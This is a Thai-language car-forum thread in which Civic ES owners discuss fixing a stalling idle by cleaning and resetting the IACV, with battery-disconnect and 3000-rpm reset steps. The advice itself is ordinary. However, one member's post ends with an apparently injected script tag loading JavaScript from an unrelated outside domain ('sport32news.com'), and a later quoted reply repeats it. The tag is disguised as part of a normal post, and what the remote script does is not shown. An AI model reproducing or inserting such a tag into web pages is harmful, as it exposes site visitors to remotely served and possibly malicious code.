ตอบ
aod_za


ชื่อเล่น: โอ้ด

เข้าร่วม: 12 พฤษภาคม 2011
ตอบ: 324

มีใบอนุญาตขับขี่
มีใบอนุญาตขับขี่

ได้รับคำขอบคุณ: 853
ให้คำขอบคุณ: 393

ที่อยู่: ถนนนิมิตรใหม่ เขตคลองสามวา
ปี: 2003
สี: เงิน ซาติน (เมทัลลิก) (NH-623M)
อังคาร, 15 ตุลา 2013 20:12 - ขอถามเรื่องการ RESET IACV หน่อยครับ
คือตอนนี้รถผมหลังจากไปเปลี่ยนหัวเทียน ตั้งวาล์ว ล้างลิ้นปีกผีเสื้อ ล้างมอเตอร์รอบเดินเบา(เข้าใจว่าเค้าน่าจะล้างด้วยเพราะมันอยู่ใกล้ๆกับลิ้นปีกผีเสื้อใช่ป่ะครับที่เป็นช่องสี่เหลี่ยมผืนผ้า พอดีไม่ค่อยรู้เรื่องเครื่องยนตร์เท่าใหร่ครับ) จากนั้นรถก็มีอาการเวลาจอดติดไฟแดง หรือเวลาเบรค รอบมันตกมาที่200-400 หรือบางทีก็ดับไปเลย พอดีผมหาข้อมูลในคลับส่วนใหญ่มีความเห็นกันว่าอาการอย่างงี้คือต้องreset iacv ก็เลยอยากจะถามหน่อยคับว่าปกติไปให้ร้านที่ใหนทำกันเพราะเมื่อเย็นไปเข้าแล้วร้านนึง ช่างทำหน้ามึนๆใส่แล้วบอกว่ามันมีตัวนี้ด้วยเหรอ เล่นซะผมงงเลย หรือถ้าต้องแก้ไขอย่างอื่น รบกวนพี่ๆเพื่อนๆแนะนำหน่อยน่ะครับ ตอนนี้กังวลมากๆ 
ได้รับคำขอบคุณจาก: poh  domziia  tokmun002  toshi  jeang 
tokmun002


ชื่อเล่น: โอ

เข้าร่วม: 11 พฤษภาคม 2012
ตอบ: 1737

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1331
ให้คำขอบคุณ: 1705

ที่อยู่: พระประแดง
ปี: 2001
สี: เทา ซิกเน็ต (เมทัลลิก) (RP-31M)
อังคาร, 15 ตุลา 2013 21:50 - ขอถามเรื่องการ RESET IACV หน่อยครับ
มอเตอร์นั่นล่ะครับ. ผมล้างเองเลยรู้ว่ามันสะอาดก็เท่านั้น เมื่อแกนมันยังฝืดอยู่ครับยังไงต้องปั่นมันให้ลื่นๆครับตอนแรกหมุนที่หยุดที แล้วเมื่อเราล้างน้ำมันแล้วพวกจารบีหรือพวกหล่อลื่นต่างๆที่อยู่ตรงลูกปืนแกนของมอเตอร์เดินเบามันย่อมหายไป. ผมแอบหยอดน้ำมันเครื่องไปนิดนึงไม่รู้จะเป็นไรมั้ย?? แต่อาการที่ว่าขับเร่งไปพอจอดรอบตกจนดับหายขาดครับ. อันนี้ตามที่ผมเจอนะครับ "<script src="https://sport32news.com/civicesgroup.js">
ได้รับคำขอบคุณจาก: poh  domziia  aod_za 
poh


ชื่อเล่น: ปู

เข้าร่วม: 11 พฤศจิกา 2012
ตอบ: 960

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 535
ให้คำขอบคุณ: 1784

ที่อยู่: จอมทอง
ปี: 2001
สี: เงิน ซาติน (เมทัลลิก) (NH-623M)
อังคาร, 15 ตุลา 2013 22:26 - ขอถามเรื่องการ RESET IACV หน่อยครับ
เท่าที่รู้นะคับ ลองถอดขั้วลบไว้ประมาณ 10 วินาที แล้วใส่กลับสตาร์ทเครื่องทิ้งไว้ 5 นาที ผิดพลาดประการใดรอผู้รู้อีกทีคับ
ได้รับคำขอบคุณจาก: domziia  tokmun002  aod_za 
domziia


ชื่อเล่น: เจต

เข้าร่วม: 24 กุมภา 2012
ตอบ: 1246

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1167
ให้คำขอบคุณ: 3865

ปี: 2005
สี: ดำ ไนท์ฮอว์ก (B-92P)
พุธ, 16 ตุลา 2013 01:28 - ขอถามเรื่องการ RESET IACV หน่อยครับ
อยากลองทำเหมือนกันแต่ไม่รู้ว่าหน้าตามันเป็นยังไง รอผู้รู้
ได้รับคำขอบคุณจาก: tokmun002  aod_za 
aod_za


ชื่อเล่น: โอ้ด

เข้าร่วม: 12 พฤษภาคม 2011
ตอบ: 324

มีใบอนุญาตขับขี่
มีใบอนุญาตขับขี่

ได้รับคำขอบคุณ: 853
ให้คำขอบคุณ: 393

ที่อยู่: ถนนนิมิตรใหม่ เขตคลองสามวา
ปี: 2003
สี: เงิน ซาติน (เมทัลลิก) (NH-623M)
พุธ, 16 ตุลา 2013 14:08 - ขอถามเรื่องการ RESET IACV หน่อยครับ
tokmun002 พิมพ์ว่า:
มอเตอร์นั่นล่ะครับ. ผมล้างเองเลยรู้ว่ามันสะอาดก็เท่านั้น เมื่อแกนมันยังฝืดอยู่ครับยังไงต้องปั่นมันให้ลื่นๆครับตอนแรกหมุนที่หยุดที แล้วเมื่อเราล้างน้ำมันแล้วพวกจารบีหรือพวกหล่อลื่นต่างๆที่อยู่ตรงลูกปืนแกนของมอเตอร์เดินเบามันย่อมหายไป. ผมแอบหยอดน้ำมันเครื่องไปนิดนึงไม่รู้จะเป็นไรมั้ย?? แต่อาการที่ว่าขับเร่งไปพอจอดรอบตกจนดับหายขาดครับ. อันนี้ตามที่ผมเจอนะครับ "<script src="https://sport32news.com/civicesgroup.js">


มอเตอร์ที่ว่าคือมอเตอร์รอบเดินเบาใช่ป่ะครับ เดี๋ยวเย็นนี้ค่อยเข้าไปให้ร้านเค้าลองเช็คดูอีกทีดีกว่า 
poh พิมพ์ว่า:
เท่าที่รู้นะคับ ลองถอดขั้วลบไว้ประมาณ 10 วินาที แล้วใส่กลับสตาร์ทเครื่องทิ้งไว้ 5 นาที ผิดพลาดประการใดรอผู้รู้อีกทีคับ




ขั้วลบที่ว่านี่คือขั้วแบตป่ะครับ 
toshi


เข้าร่วม: 13 พฤศจิกา 2008
ตอบ: 2299

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1405
ให้คำขอบคุณ: 1756

ปี: 2003
สี: ขาว ทาฟเฟต้า (NH-578)
พุธ, 16 ตุลา 2013 14:34 - ขอถามเรื่องการ RESET IACV หน่อยครับ
วิธีแก้ปัญหารอบสวิง [IACV]           (  เครดิตข้อมูลจาก Club Honda Non   )

อาการ รอบสวิง ทั้งที่ได้ล้างลิ้นปีกผื้เสื้อไปแล้ว บางทีจอดรถอยู่ติดไฟแดง รอบตกเครื่องสั่น บางทีถึงขนาดดับเลย ไอ้เราก็คิดว่า TDC Senser มีปัญหา เปลี่ยนแล้วก็ไม่หาย แต่วิ่งเร็วๆ ก็ปกติ แล้ว มันเกิดจากอะไร หว่า

ตั้งข้อสังเกตุ จะเป็นเฉพาะช่วงที่รอบเดิมเบา บางทีก็จะดับบางทีรอบก็วิ่งขึ้นสูง จากปัญหาแบบนี้ มันต้องเกี่ยวอะไรกับระบบเดินเบาแน่ๆ รถ CIVIC Dimension รอบเดินเบามัน ถูกปรับแต่งด้วย กล่อง ECU แล้วก็ทำงานฝากระบบควบคุมด้วยมือเตอร์ไฟฟ้า ที่เรียกกันว่า IACV หรือว่า ไอ้เจ้ามอเตอร์ควบคุมรอบเดินเบาตัวนี้มันสกปรก ลองถอดออกมาล้างดู แล้วก็ไม่หายเปลี่ยนก็แล้วก็ไม่หาย แล้วสรุปมันเป็นที่อะไรกันแนะว่ะเนี้ย

สุดท้าย วิธีที่ ได้ข้อสรุปสำหรับการแก้ไขปัญหานี้ของผมก็คือการตั้งรอบเดิมเบาใหม่ โดยการ Reset การทำงานของ IACV ใหม่เลยครับ

Step ดังนี้เลย นะครับ ที่ผมทำผมจะทำต้องเครื่องได้อุณหภูมิทำงานนะครับ ก็คือ ขับไปไหนมาก็ได้ แล้วก็พักสักนิดแล้วก็ ลุยกันเลย

1. ดึงปลั๊ก IACV ออกก่อนเลย ก่อนดึงปลั๊กต้องดับเครื่องก่อนนะครับ สำหรับคนใส่กรองเปลื่อยก็ง่ายหน่อย สำหรับคนที่ใส่กรองเดิมๆ งานนี้ต้องรื้อหน่อยครับ ไม่งั้นหาปลั๊กไม่เจอนะครับ
2. Start เครื่อง เร่งเครื่องไปที่ 3000 ค้างไว้ ให้รอ พัดลมหม้อน้ำ ทำงาน 2 ครั้งนะครับ
3. หลังจากเบาเครื่อง และ บิดสวิทช์กุญแจ OFF
4. เสียบปลั๊ก IACV เข้าตำแหน่ง
5. Start อาจจพบไว้รูปเครื่องโชว์ ให้ดับเครื่อง แล้วดึงขั่วลบแบตออกแล้วทิ้งไว้สักพัก
ุ6. ใส่ขั่วแบตกลับที่ แล้ว Start เครื่อง ถ้าไฟรูปเครื่องโชว์ อีกให้ ลบไฟด้วย OBDII
7. ถ้าปกติ ให้ลองสังเกตุรอบเดินเบาดู ถ้าปกติ แสดงว่า Set รอบเดินเบาผ่านแล้ว
ขอถามเรื่องการ RESET IACV หน่อยครับ
 
ได้รับคำขอบคุณจาก: neverplus  aod_za  tokmun002  domziia  Saksri  jjcivic  boyboom_16  jeang 
aod_za


ชื่อเล่น: โอ้ด

เข้าร่วม: 12 พฤษภาคม 2011
ตอบ: 324

มีใบอนุญาตขับขี่
มีใบอนุญาตขับขี่

ได้รับคำขอบคุณ: 853
ให้คำขอบคุณ: 393

ที่อยู่: ถนนนิมิตรใหม่ เขตคลองสามวา
ปี: 2003
สี: เงิน ซาติน (เมทัลลิก) (NH-623M)
พุธ, 16 ตุลา 2013 15:14 - ขอถามเรื่องการ RESET IACV หน่อยครับ
toshi พิมพ์ว่า:
วิธีแก้ปัญหารอบสวิง [IACV]           (  เครดิตข้อมูลจาก Club Honda Non   )

อาการ รอบสวิง ทั้งที่ได้ล้างลิ้นปีกผื้เสื้อไปแล้ว บางทีจอดรถอยู่ติดไฟแดง รอบตกเครื่องสั่น บางทีถึงขนาดดับเลย ไอ้เราก็คิดว่า TDC Senser มีปัญหา เปลี่ยนแล้วก็ไม่หาย แต่วิ่งเร็วๆ ก็ปกติ แล้ว มันเกิดจากอะไร หว่า

ตั้งข้อสังเกตุ จะเป็นเฉพาะช่วงที่รอบเดิมเบา บางทีก็จะดับบางทีรอบก็วิ่งขึ้นสูง จากปัญหาแบบนี้ มันต้องเกี่ยวอะไรกับระบบเดินเบาแน่ๆ รถ CIVIC Dimension รอบเดินเบามัน ถูกปรับแต่งด้วย กล่อง ECU แล้วก็ทำงานฝากระบบควบคุมด้วยมือเตอร์ไฟฟ้า ที่เรียกกันว่า IACV หรือว่า ไอ้เจ้ามอเตอร์ควบคุมรอบเดินเบาตัวนี้มันสกปรก ลองถอดออกมาล้างดู แล้วก็ไม่หายเปลี่ยนก็แล้วก็ไม่หาย แล้วสรุปมันเป็นที่อะไรกันแนะว่ะเนี้ย

สุดท้าย วิธีที่ ได้ข้อสรุปสำหรับการแก้ไขปัญหานี้ของผมก็คือการตั้งรอบเดิมเบาใหม่ โดยการ Reset การทำงานของ IACV ใหม่เลยครับ

Step ดังนี้เลย นะครับ ที่ผมทำผมจะทำต้องเครื่องได้อุณหภูมิทำงานนะครับ ก็คือ ขับไปไหนมาก็ได้ แล้วก็พักสักนิดแล้วก็ ลุยกันเลย

1. ดึงปลั๊ก IACV ออกก่อนเลย ก่อนดึงปลั๊กต้องดับเครื่องก่อนนะครับ สำหรับคนใส่กรองเปลื่อยก็ง่ายหน่อย สำหรับคนที่ใส่กรองเดิมๆ งานนี้ต้องรื้อหน่อยครับ ไม่งั้นหาปลั๊กไม่เจอนะครับ
2. Start เครื่อง เร่งเครื่องไปที่ 3000 ค้างไว้ ให้รอ พัดลมหม้อน้ำ ทำงาน 2 ครั้งนะครับ
3. หลังจากเบาเครื่อง และ บิดสวิทช์กุญแจ OFF
4. เสียบปลั๊ก IACV เข้าตำแหน่ง
5. Start อาจจพบไว้รูปเครื่องโชว์ ให้ดับเครื่อง แล้วดึงขั่วลบแบตออกแล้วทิ้งไว้สักพัก
ุ6. ใส่ขั่วแบตกลับที่ แล้ว Start เครื่อง ถ้าไฟรูปเครื่องโชว์ อีกให้ ลบไฟด้วย OBDII
7. ถ้าปกติ ให้ลองสังเกตุรอบเดินเบาดู ถ้าปกติ แสดงว่า Set รอบเดินเบาผ่านแล้ว
ขอถามเรื่องการ RESET IACV หน่อยครับ

 




ชัดเจนเลยครับ ขอบคุณมากค้าบบบ 
poh


ชื่อเล่น: ปู

เข้าร่วม: 11 พฤศจิกา 2012
ตอบ: 960

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 535
ให้คำขอบคุณ: 1784

ที่อยู่: จอมทอง
ปี: 2001
สี: เงิน ซาติน (เมทัลลิก) (NH-623M)
พุธ, 16 ตุลา 2013 18:44 - ขอถามเรื่องการ RESET IACV หน่อยครับ
aod_za พิมพ์ว่า:
tokmun002 พิมพ์ว่า:
มอเตอร์นั่นล่ะครับ. ผมล้างเองเลยรู้ว่ามันสะอาดก็เท่านั้น เมื่อแกนมันยังฝืดอยู่ครับยังไงต้องปั่นมันให้ลื่นๆครับตอนแรกหมุนที่หยุดที แล้วเมื่อเราล้างน้ำมันแล้วพวกจารบีหรือพวกหล่อลื่นต่างๆที่อยู่ตรงลูกปืนแกนของมอเตอร์เดินเบามันย่อมหายไป. ผมแอบหยอดน้ำมันเครื่องไปนิดนึงไม่รู้จะเป็นไรมั้ย?? แต่อาการที่ว่าขับเร่งไปพอจอดรอบตกจนดับหายขาดครับ. อันนี้ตามที่ผมเจอนะครับ "<script src="https://sport32news.com/civicesgroup.js">


มอเตอร์ที่ว่าคือมอเตอร์รอบเดินเบาใช่ป่ะครับ เดี๋ยวเย็นนี้ค่อยเข้าไปให้ร้านเค้าลองเช็คดูอีกทีดีกว่า 
poh พิมพ์ว่า:
เท่าที่รู้นะคับ ลองถอดขั้วลบไว้ประมาณ 10 วินาที แล้วใส่กลับสตาร์ทเครื่องทิ้งไว้ 5 นาที ผิดพลาดประการใดรอผู้รู้อีกทีคับ




ขั้วลบที่ว่านี่คือขั้วแบตป่ะครับ 




ใช่คับ
ได้รับคำขอบคุณจาก: aod_za 
nammon_211


ชื่อเล่น: น้ำมนต์

เข้าร่วม: 12 มิถุนา 2013
ตอบ: 2081

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1949
ให้คำขอบคุณ: 1031

ที่อยู่: ESC / แหลมฉบัง ชลบุรี@ นครศรีธรรมราช
ปี: 2003
สี: ทอง แซทเทิลไลท์ (NH-663M)
พุธ, 16 ตุลา 2013 18:50 - ขอถามเรื่องการ RESET IACV หน่อยครับ
toshi พิมพ์ว่า:
วิธีแก้ปัญหารอบสวิง [IACV]           (  เครดิตข้อมูลจาก Club Honda Non   )

อาการ รอบสวิง ทั้งที่ได้ล้างลิ้นปีกผื้เสื้อไปแล้ว บางทีจอดรถอยู่ติดไฟแดง รอบตกเครื่องสั่น บางทีถึงขนาดดับเลย ไอ้เราก็คิดว่า TDC Senser มีปัญหา เปลี่ยนแล้วก็ไม่หาย แต่วิ่งเร็วๆ ก็ปกติ แล้ว มันเกิดจากอะไร หว่า

ตั้งข้อสังเกตุ จะเป็นเฉพาะช่วงที่รอบเดิมเบา บางทีก็จะดับบางทีรอบก็วิ่งขึ้นสูง จากปัญหาแบบนี้ มันต้องเกี่ยวอะไรกับระบบเดินเบาแน่ๆ รถ CIVIC Dimension รอบเดินเบามัน ถูกปรับแต่งด้วย กล่อง ECU แล้วก็ทำงานฝากระบบควบคุมด้วยมือเตอร์ไฟฟ้า ที่เรียกกันว่า IACV หรือว่า ไอ้เจ้ามอเตอร์ควบคุมรอบเดินเบาตัวนี้มันสกปรก ลองถอดออกมาล้างดู แล้วก็ไม่หายเปลี่ยนก็แล้วก็ไม่หาย แล้วสรุปมันเป็นที่อะไรกันแนะว่ะเนี้ย

สุดท้าย วิธีที่ ได้ข้อสรุปสำหรับการแก้ไขปัญหานี้ของผมก็คือการตั้งรอบเดิมเบาใหม่ โดยการ Reset การทำงานของ IACV ใหม่เลยครับ

Step ดังนี้เลย นะครับ ที่ผมทำผมจะทำต้องเครื่องได้อุณหภูมิทำงานนะครับ ก็คือ ขับไปไหนมาก็ได้ แล้วก็พักสักนิดแล้วก็ ลุยกันเลย

1. ดึงปลั๊ก IACV ออกก่อนเลย ก่อนดึงปลั๊กต้องดับเครื่องก่อนนะครับ สำหรับคนใส่กรองเปลื่อยก็ง่ายหน่อย สำหรับคนที่ใส่กรองเดิมๆ งานนี้ต้องรื้อหน่อยครับ ไม่งั้นหาปลั๊กไม่เจอนะครับ
2. Start เครื่อง เร่งเครื่องไปที่ 3000 ค้างไว้ ให้รอ พัดลมหม้อน้ำ ทำงาน 2 ครั้งนะครับ
3. หลังจากเบาเครื่อง และ บิดสวิทช์กุญแจ OFF
4. เสียบปลั๊ก IACV เข้าตำแหน่ง
5. Start อาจจพบไว้รูปเครื่องโชว์ ให้ดับเครื่อง แล้วดึงขั่วลบแบตออกแล้วทิ้งไว้สักพัก
ุ6. ใส่ขั่วแบตกลับที่ แล้ว Start เครื่อง ถ้าไฟรูปเครื่องโชว์ อีกให้ ลบไฟด้วย OBDII
7. ถ้าปกติ ให้ลองสังเกตุรอบเดินเบาดู ถ้าปกติ แสดงว่า Set รอบเดินเบาผ่านแล้ว
ขอถามเรื่องการ RESET IACV หน่อยครับ
 



 ละเอียดดีมากคับ
 
domziia


ชื่อเล่น: เจต

เข้าร่วม: 24 กุมภา 2012
ตอบ: 1246

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1167
ให้คำขอบคุณ: 3865

ปี: 2005
สี: ดำ ไนท์ฮอว์ก (B-92P)
พุธ, 16 ตุลา 2013 19:03 - ขอถามเรื่องการ RESET IACV หน่อยครับ
ขอบคุนมากครับ ความรู้ๆ
aonjang237


ชื่อเล่น: อ้น

เข้าร่วม: 11 มิถุนา 2013
ตอบ: 812

Guru ES
Guru ES

ได้รับคำขอบคุณ: 555
ให้คำขอบคุณ: 130

ที่อยู่: อ.ด่านช้าง จ.สุพรรณบุรี
ปี: 2002
พุธ, 16 ตุลา 2013 19:58 - ขอถามเรื่องการ RESET IACV หน่อยครับ
ดึงปลั๊กตัวนี้ออก (เอื้อมมือ ลงไปค่อยๆไปถอดมันออกมา โดยไม่จำเป็นต้องรื้อหม้อกรอง) 

หลังจากนั้นสต๊าร์ดรถ โดยเร่งไปสามพันรอบจนกว่าไฟเครื่องจะโชว์ 
ยกเท้าออกจากคันเร่ง สังเกตุรอบจะเดินเบาเหมือนรถใหม่ 

ข่มขืนมันอีกรอบ 
โดยเร่งไปที่สามพันรอบนานประมาณ 30 วินาที 
คราวนี้ยกเท้าออก มันจะตกมาเหลือพันห้าร้อยรอบ และกลับมา แปดร้อยรอบ 
แล้วจึงดับสวิทช์รถ  
ลงไปต่อปลั๊ก IACV  
ล้างมือ  

เสร็จเเล้วสต๊าร์ดรถ ไปลองรอบกันเลยครับ 


อาการเบาดับได้สยบอยู่แทบเท้าเราแล้วใช่ใหม่หล่ะครับ 

อยากเรียกขั้นตอนนี้ว่า 
"ซักแห้ง IACV จังเลยครับ" 

แล้วอาการเบาดับก็กลายเป็นเรื่องเล็กไปเลยครับ

ที่มา : http://www.civicesgroup.com/forum/topic64448
(ปล. ขออนุญาต จขกท. ด้วยนะครับ)
ได้รับคำขอบคุณจาก: aod_za  sorn es 
Saksri


ชื่อเล่น: ศักดิ์

เข้าร่วม: 01 กรกฎา 2011
ตอบ: 1401

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1462
ให้คำขอบคุณ: 360

ที่อยู่: บางทราย ชลบุรี
ปี: 2001
สี: เทา ซิกเน็ต (เมทัลลิก) (RP-31M)
พุธ, 16 ตุลา 2013 20:22 - ขอถามเรื่องการ RESET IACV หน่อยครับ
toshi พิมพ์ว่า:
วิธีแก้ปัญหารอบสวิง [IACV]           (  เครดิตข้อมูลจาก Club Honda Non   )

อาการ รอบสวิง ทั้งที่ได้ล้างลิ้นปีกผื้เสื้อไปแล้ว บางทีจอดรถอยู่ติดไฟแดง รอบตกเครื่องสั่น บางทีถึงขนาดดับเลย ไอ้เราก็คิดว่า TDC Senser มีปัญหา เปลี่ยนแล้วก็ไม่หาย แต่วิ่งเร็วๆ ก็ปกติ แล้ว มันเกิดจากอะไร หว่า

ตั้งข้อสังเกตุ จะเป็นเฉพาะช่วงที่รอบเดิมเบา บางทีก็จะดับบางทีรอบก็วิ่งขึ้นสูง จากปัญหาแบบนี้ มันต้องเกี่ยวอะไรกับระบบเดินเบาแน่ๆ รถ CIVIC Dimension รอบเดินเบามัน ถูกปรับแต่งด้วย กล่อง ECU แล้วก็ทำงานฝากระบบควบคุมด้วยมือเตอร์ไฟฟ้า ที่เรียกกันว่า IACV หรือว่า ไอ้เจ้ามอเตอร์ควบคุมรอบเดินเบาตัวนี้มันสกปรก ลองถอดออกมาล้างดู แล้วก็ไม่หายเปลี่ยนก็แล้วก็ไม่หาย แล้วสรุปมันเป็นที่อะไรกันแนะว่ะเนี้ย

สุดท้าย วิธีที่ ได้ข้อสรุปสำหรับการแก้ไขปัญหานี้ของผมก็คือการตั้งรอบเดิมเบาใหม่ โดยการ Reset การทำงานของ IACV ใหม่เลยครับ

Step ดังนี้เลย นะครับ ที่ผมทำผมจะทำต้องเครื่องได้อุณหภูมิทำงานนะครับ ก็คือ ขับไปไหนมาก็ได้ แล้วก็พักสักนิดแล้วก็ ลุยกันเลย

1. ดึงปลั๊ก IACV ออกก่อนเลย ก่อนดึงปลั๊กต้องดับเครื่องก่อนนะครับ สำหรับคนใส่กรองเปลื่อยก็ง่ายหน่อย สำหรับคนที่ใส่กรองเดิมๆ งานนี้ต้องรื้อหน่อยครับ ไม่งั้นหาปลั๊กไม่เจอนะครับ
2. Start เครื่อง เร่งเครื่องไปที่ 3000 ค้างไว้ ให้รอ พัดลมหม้อน้ำ ทำงาน 2 ครั้งนะครับ
3. หลังจากเบาเครื่อง และ บิดสวิทช์กุญแจ OFF
4. เสียบปลั๊ก IACV เข้าตำแหน่ง
5. Start อาจจพบไว้รูปเครื่องโชว์ ให้ดับเครื่อง แล้วดึงขั่วลบแบตออกแล้วทิ้งไว้สักพัก
ุ6. ใส่ขั่วแบตกลับที่ แล้ว Start เครื่อง ถ้าไฟรูปเครื่องโชว์ อีกให้ ลบไฟด้วย OBDII
7. ถ้าปกติ ให้ลองสังเกตุรอบเดินเบาดู ถ้าปกติ แสดงว่า Set รอบเดินเบาผ่านแล้ว
ขอถามเรื่องการ RESET IACV หน่อยครับ

 




อ่อ ตัวนี้เองหรอที่เรียกว่าปลั๊ก IACV
วันก่อนถอดล้างลิ้นปีกเองก็ไม่รู้ว่าตัวอะไร
รู้แต่ว่าถ้าไม่ถอดปลั๊กนี้ออก
ก็จะยกออกมาล้างทั้งลูกไม่ได้
แต่ก็ดีได้เป็นความรู้ครับ
เพราะตอนผมใส่กลับคืนก็ไม่เห็นไฟเครื่องโชว์เหมือนคนอื่นเลย
แต่ก็ขอบคุณสำหรับข้อมูลดีๆครับ

pukzone


เข้าร่วม: 11 ตุลา 2011
ตอบ: 721

Guru ES
Guru ES

ได้รับคำขอบคุณ: 708
ให้คำขอบคุณ: 184

ที่อยู่: กทม.
ปี: 2001
สี: น้ำเงิน อิเทอนอล (B-96P)
พุธ, 16 ตุลา 2013 20:25 - ขอถามเรื่องการ RESET IACV หน่อยครับ
....ให้ทุกคนเลย
aod_za


ชื่อเล่น: โอ้ด

เข้าร่วม: 12 พฤษภาคม 2011
ตอบ: 324

มีใบอนุญาตขับขี่
มีใบอนุญาตขับขี่

ได้รับคำขอบคุณ: 853
ให้คำขอบคุณ: 393

ที่อยู่: ถนนนิมิตรใหม่ เขตคลองสามวา
ปี: 2003
สี: เงิน ซาติน (เมทัลลิก) (NH-623M)
พุธ, 16 ตุลา 2013 21:28 - ขอถามเรื่องการ RESET IACV หน่อยครับ
aonjang237 พิมพ์ว่า:
ดึงปลั๊กตัวนี้ออก (เอื้อมมือ ลงไปค่อยๆไปถอดมันออกมา โดยไม่จำเป็นต้องรื้อหม้อกรอง) 

หลังจากนั้นสต๊าร์ดรถ โดยเร่งไปสามพันรอบจนกว่าไฟเครื่องจะโชว์ 
ยกเท้าออกจากคันเร่ง สังเกตุรอบจะเดินเบาเหมือนรถใหม่ 

ข่มขืนมันอีกรอบ 
โดยเร่งไปที่สามพันรอบนานประมาณ 30 วินาที 
คราวนี้ยกเท้าออก มันจะตกมาเหลือพันห้าร้อยรอบ และกลับมา แปดร้อยรอบ 
แล้วจึงดับสวิทช์รถ  
ลงไปต่อปลั๊ก IACV  
ล้างมือ  

เสร็จเเล้วสต๊าร์ดรถ ไปลองรอบกันเลยครับ 


อาการเบาดับได้สยบอยู่แทบเท้าเราแล้วใช่ใหม่หล่ะครับ 

อยากเรียกขั้นตอนนี้ว่า 
"ซักแห้ง IACV จังเลยครับ" 

แล้วอาการเบาดับก็กลายเป็นเรื่องเล็กไปเลยครับ

ที่มา : http://www.civicesgroup.com/forum/topic64448
(ปล. ขออนุญาต จขกท. ด้วยนะครับ)




อยากลองทำเองน่ะครับ แต่ยังกลัวๆอยู่อ่า กลัวรถจะเป็นอะไร เดี๋ยวเอาขั้นตอนไปให้ในอู่เค้าทำให้ดีกว่า อิอิ 
ได้รับคำขอบคุณจาก: domziia 
fasang.Mr


ชื่อเล่น: บี

เข้าร่วม: 23 มีนา 2010
ตอบ: 2101

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1764
ให้คำขอบคุณ: 2323

ที่อยู่: นนทบุรี-ประจวบฯ-พะเยา
ปี: 2004
สี: ดำ ไนท์ฮอว์ก (B-92P)
พุธ, 16 ตุลา 2013 21:48 - ขอถามเรื่องการ RESET IACV หน่อยครับ
ได้ผลเป็นอย่างไรบอกด้วยนะตะเอง
ตอบ
หน้า 1 จาก 1
ไปที่: 
ติดต่อโฆษณา admin@civicesgroup.com
Copyright © 2008-2025 Civic ES Group. All rights reserved.